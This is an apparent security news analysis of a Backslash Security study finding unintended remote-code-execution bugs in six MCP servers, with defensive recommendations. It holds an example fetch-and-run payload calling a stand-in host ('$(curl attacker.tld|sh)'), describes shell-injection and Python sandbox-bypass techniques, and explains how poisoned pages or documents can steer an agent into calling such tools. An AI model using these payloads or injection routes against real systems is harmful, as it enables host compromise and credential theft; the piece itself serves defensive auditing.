Six MCP Servers Shipped RCE Nobody Meant to Build — 29% of the Top 8,000 Carry a Risk Finding

On 24 September 2026, Backslash Security published an analysis of the 8,000 most-starred MCP servers — drawn from more than 80,000 the firm says it regularly scans and indexes — and reported that 29% contained at least one risk finding. The headline number is the least interesting part. What matters is the follow-up: Backslash hand-reviewed a handful of servers that surfaced remote-code-execution risk, tracing each one from client-controlled input to the execution sink, and concluded that all six confirmed findings were unintended defects in tools that were never supposed to offer host-level execution at all.

That distinction is the whole story. An MCP server that advertises a shell tool is a policy decision — you can gate it, sandbox it, deny it. An MCP server that advertises "fetch documentation" or "launch an application" and quietly reaches /bin/sh -c is something no allowlist based on tool names can catch.

Six tools, six routes to the host

Backslash masked the identity of the affected servers to avoid handing out targets, but described each defect concretely enough to be actionable as a code-review pattern:

  • Cloud resource tool — bypassable Python sandbox (rated Critical). The server accepted a code_snippet parameter and ran it through compile() and exec(), blocking import statements for modules outside an allowlist. The check inspected import statements but not function calls, leaving the __import__() built-in reachable — enough to load a prohibited OS module and execute host commands. The server held a live cloud session, so successful exploitation reached the cloud credentials and permissions of the MCP process.
  • Documentation retrieval tool — shell injection. Repository URLs, subdirectories, and file URLs were interpolated into shell strings executed via /bin/sh -c. Some values were unquoted, so ;, &&, and | escaped the intended command; one value sat inside double quotes and remained vulnerable to $() and backtick substitution.
  • Container management tool — host command injection. A docker run command was assembled from client-controlled fields (command, platform, network, DNS, hostname, device, user, restart, port, entrypoint, image) and run through a host shell. One execution path verified that the completed command began with docker — which does nothing to stop additional commands being appended. A call that fully respected the declared tool schema could still reach an injectable field.
  • macOS application launcher — unsafe shell expansion. The application name (and in one tool a file path) went into a shell-based execution function inside double quotes. Separator payloads were blocked; command substitution was not. The application name was never resolved against an allowlist of installed applications.
  • Apple Shortcuts tool — unsafe command construction. Shortcut name and optional input were placed directly into a shell command. A literal quote could terminate the quoted value and expose further shell operators. No escaping, no allowlist, no confirmation step.
  • Website downloader — incomplete URL and path validation. The tool parsed the URL to extract a hostname, then inserted the original unescaped string into a wget command along with an unsanitised output path. Backslash notes this one had already been reported by an independent researcher and assigned a CVE; the firm independently verified it and identified the URL parameter as an additional injection vector beyond the originally reported output path.

The failure mode is validation that matches the parser, not the sink

Five of the six are the same bug wearing different clothes: input was validated against the format the developer was thinking about, and then handed to an interpreter that cares about something else entirely. A string can be a structurally valid URL and a shell metacharacter carrier at the same time. A value can be non-empty, string-typed, and still contain $(curl attacker.tld|sh). Double quotes stop word splitting; they do not stop substitution. Backslash's phrasing is the right one to put in a review checklist: validation must reflect how the value will ultimately be used.

The container case deserves separate attention, because it inverts an assumption teams lean on hard. Running the workload in a container does not help when the injection lands in the command used to launch the container. The isolation boundary is downstream of the vulnerability.

Why a local-only server is still remotely exploitable

None of these servers need to expose a public listener to be attacked. The delivery path is the model. If an agent can be induced — through a poisoned webpage, document, repository, issue, or message — to call one of these tools with a crafted argument, the resulting command executes with the privileges, credentials, filesystem access, and network reach of the local MCP process. Indirect prompt injection turns a local tool defect into a remote one, and every server in this study sits on a developer workstation or a CI runner with tokens in the environment.

This is the same structural point that Deadbugz made from the description-mutation side: the manifest an agent trusts and the behaviour it gets are two different things, separated only by whoever wrote the implementation.

Where this sits in the measurement record

The MCP ecosystem now has several independent censuses, and they keep agreeing in an uncomfortable way. Backslash's own NeighborJack work found hundreds of servers reachable by anyone on the same local network. OX Security's STDIO command-injection research described the same sink from the transport layer. TrendAI counted 4,982 flaws across 2,259 public servers. Last week OX's 15,465-server inventory turned up six abandoned domains anyone could buy. Different samples, different methods, the same finding: popularity is not a security signal, and the median public MCP server has not been reviewed by anyone who was looking for this.

Backslash makes that point explicitly — an enterprise cannot determine a server's effective capabilities from its name, description, tool schema, or GitHub stars. Those help with discovery. They are not controls.

What to do

  • Review your own MCP servers for shell construction first. Grep for shell=True, exec, execSync, child_process.exec, /bin/sh -c, and string-interpolated command builders. Replace them with argument-array process APIs that never invoke a shell. This is a one-afternoon audit that covers five of the six findings above.
  • Treat model-generated code execution as a privileged capability. If a tool runs submitted code, it needs process isolation, minimal credentials, and explicit approval — not a denylist of import syntax. Denylists on Python built-ins have lost this argument repeatedly.
  • Govern at the tool level, not the server level. A single server routinely mixes a harmless read tool with an execution sink. Approve capabilities individually; require confirmation for command execution, credential access, file modification, and data transfer.
  • Scope the process, not just the prompt. Run each MCP server with only the filesystem, network, and cloud access its tools require, and stop MCP processes from inheriting ambient cloud credentials. The critical finding above was severe specifically because a live cloud session was in reach.
  • Audit against a written standard. The CIS MCP Server Benchmark v1.0.0 covers Isolation and Execution Safety and Server Configuration directly, with audit procedures attached — which is what turns findings like these into a recurring check rather than a news cycle.
  • Assume pre-install vetting is incomplete. Monitor tool calls at runtime for unexpected command execution and outbound data movement. A server that passes review on Monday can be updated on Tuesday.

Sources: